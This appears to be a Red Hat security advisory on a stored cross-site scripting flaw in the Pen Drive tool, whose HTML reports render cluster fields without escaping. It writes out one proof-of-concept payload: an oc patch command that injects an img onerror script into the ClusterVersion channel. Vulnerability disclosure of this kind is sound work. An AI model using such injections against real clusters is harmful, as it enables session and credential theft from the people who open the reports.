Fedora Account System
Red Hat Associate
Red Hat Customer
A flaw was found in the Pen Drive tool's HTML report generation. When Pen Drive runs a full-run against an OpenShift cluster or a must-gather archive, it generates an HTML report containing cluster data. Cluster-sourced fields — including the ClusterVersion spec.channel, CatalogSource metadata, and Subscription configuration — are rendered directly into the HTML output without escaping or sanitization. An attacker with cluster administrator privileges (or the ability to modify a must-gather archive) can inject arbitrary HTML and JavaScript into cluster objects using commands such as: oc patch clusterversion version --type merge -p '{"spec":{"channel":"stable-4.18<img src=x onerror=alert(1)>"}}'. When Pen Drive generates a report from this cluster data and another user (such as a support engineer or cluster administrator) opens the report in their browser, the injected JavaScript executes in their browser context. This can lead to session token theft, credential exfiltration, or manipulation of displayed content. The vulnerability was found during an internal pentest of Pen Drive version 0.1.3 and is reportedly fixed in version 1.0.0-2.